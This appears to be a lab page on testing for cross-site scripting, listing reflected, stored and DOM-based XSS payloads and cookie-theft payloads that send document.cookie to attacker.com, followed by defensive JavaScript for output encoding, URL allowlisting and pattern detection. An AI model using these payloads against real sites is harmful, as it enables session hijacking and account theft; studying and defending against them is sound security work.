💉 XSS (Cross-Site Scripting) Testing

1. Reflected XSS

Test for reflected XSS vulnerabilities.

Example Payloads:
• <script>alert('XSS')</script>
• <img src=x onerror=alert('XSS')>
• <svg onload=alert('XSS')>
• <iframe src="javascript:alert('XSS')">
• <body onload=alert('XSS')>
• <script>document.location='http://attacker.com/?c='+document.cookie</script>

2. Stored XSS (Persistent)

Test for stored XSS in the comments section.

Example Payloads:
• <script>alert(document.cookie)</script>
• <img src=x onerror="fetch('http://attacker.com/?c='+document.cookie)">
• <svg/onload=alert('Stored XSS')>
• <iframe src="javascript:alert('Stored XSS')"></iframe>
• <script>new Image().src='http://attacker.com/steal.php?cookie='+document.cookie</script>

3. DOM-Based XSS

Test for DOM-based XSS vulnerabilities.

Example Payloads:
• <img src=x onerror=alert('DOM XSS')>
• <svg/onload=alert(document.domain)>
• <iframe src="javascript:alert('DOM XSS')">
• Try in URL: #<script>alert('Hash XSS')</script>
• <img src=x onerror="eval(atob('YWxlcnQoJ1hTUycp'))">

4. Cookie Theft Demonstration

Test for session hijacking via XSS.

Cookie Theft Payloads:
• <script>fetch('http://attacker.com/?c='+document.cookie)</script>
• <img src=x onerror="new Image().src='http://attacker.com/steal?c='+document.cookie">
• <script>window.location='http://attacker.com/?c='+btoa(document.cookie)</script>
• <script>navigator.sendBeacon('http://attacker.com',document.cookie)</script>
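As an added defensive counterpart to the payload lists above (example code written for this page, not part of the lab itself), the block below shows the two controls that neutralise every payload listed: HTML output encoding for text and attribute contexts, and a URL-scheme allowlist for the javascript: iframe cases, plus a coarse detector of the kind a WAF or log review would run over request parameters. The PAYLOADS array is constructed from the page's own entries for testing.

```javascript
// Defensive example added alongside the lab page's payload lists.
// PAYLOADS are constructed test inputs copied from the sections above.
const PAYLOADS = [
  "<script>alert('XSS')</script>",
  "<img src=x onerror=alert('XSS')>",
  "<svg/onload=alert(document.domain)>",
  '<iframe src="javascript:alert(\'XSS\')">',
  "<body onload=alert('XSS')>",
  "<img src=x onerror=\"eval(atob('YWxlcnQoJ1hTUycp'))\">",
  "<script>navigator.sendBeacon('http://attacker.com',document.cookie)</script>",
];

// HTML-encode every character that can break out of a text node or a
// quoted attribute value. Apply this to the comment body (stored XSS
// section) and to any reflected parameter written into the response.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;',
                       '"': '&quot;', "'": '&#x27;', '/': '&#x2F;' };
function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"'\/]/g, ch => HTML_ESCAPES[ch]);
}

// Correctly encoded output contains no raw markup metacharacters at all.
function isInert(encoded) {
  return !/[<>"']/.test(encoded);
}

// Allow only http(s) for user-supplied link or frame targets; this rejects
// the javascript: URLs used by the iframe payloads. Control characters and
// case are normalised before the check so "java\tscript:" is not missed.
function safeHref(url) {
  const norm = String(url).trim().replace(/[\u0000-\u0020]/g, '').toLowerCase();
  return /^https?:\/\//.test(norm) ? String(url).trim() : '#';
}

// Coarse WAF/log-style detector: dangerous tags, inline event handlers and
// javascript: URLs. One layer of URL decoding is applied first because
// reflected payloads arrive in the query string. Expect false positives.
const XSS_PATTERN =
  /<\s*\/?\s*(script|img|svg|iframe|body|object|embed)\b|\bon[a-z]+\s*=|javascript\s*:/i;
function looksLikeXss(rawParam) {
  let decoded = rawParam;
  try { decoded = decodeURIComponent(rawParam); } catch (e) { /* keep raw */ }
  return XSS_PATTERN.test(decoded);
}

// Every page payload must be inert once encoded and must trip the detector
// when it arrives URL-encoded in a request parameter.
function checkPayloads() {
  return PAYLOADS.every(p =>
    isInert(escapeHtml(p)) && looksLikeXss(encodeURIComponent(p)));
}
```

The hash-based DOM XSS entry is handled by the same rule on the client: write `location.hash` into the page through `textContent`, never `innerHTML`, so no encoding step is needed there.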